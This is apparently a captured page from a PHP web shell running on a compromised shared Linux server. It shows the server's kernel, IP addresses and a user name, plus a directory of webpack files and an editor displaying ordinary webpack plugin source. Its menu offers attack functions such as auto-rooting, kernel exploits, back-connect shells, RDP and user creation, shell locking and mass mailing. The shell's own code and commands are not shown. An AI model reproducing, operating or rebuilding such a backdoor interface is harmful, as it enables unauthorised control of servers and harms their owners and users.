Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
webpack /
lib /
webworker /
[ HOME SHELL ]
Name
Size
Permission
Action
WebWorkerChunkTemplatePlugin.j...
1021
B
-rw-r--r--
WebWorkerHotUpdateChunkTemplat...
1.18
KB
-rw-r--r--
WebWorkerMainTemplate.runtime....
2.08
KB
-rw-r--r--
WebWorkerMainTemplatePlugin.js
5.83
KB
-rw-r--r--
WebWorkerTemplatePlugin.js
814
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : WebWorkerChunkTemplatePlugin.js
/* MIT License http://www.opensource.org/licenses/mit-license.php Author Tobias Koppers @sokra */ "use strict"; const { ConcatSource } = require("webpack-sources"); class WebWorkerChunkTemplatePlugin { apply(chunkTemplate) { chunkTemplate.hooks.render.tap( "WebWorkerChunkTemplatePlugin", (modules, chunk) => { const chunkCallbackName = chunkTemplate.outputOptions.chunkCallbackName; const globalObject = chunkTemplate.outputOptions.globalObject; const source = new ConcatSource(); source.add( `${globalObject}[${JSON.stringify( chunkCallbackName )}](${JSON.stringify(chunk.ids)},` ); source.add(modules); source.add(")"); return source; } ); chunkTemplate.hooks.hash.tap("WebWorkerChunkTemplatePlugin", hash => { hash.update("webworker"); hash.update("3"); hash.update(`${chunkTemplate.outputOptions.chunkCallbackName}`); hash.update(`${chunkTemplate.outputOptions.globalObject}`); }); } } module.exports = WebWorkerChunkTemplatePlugin;
Close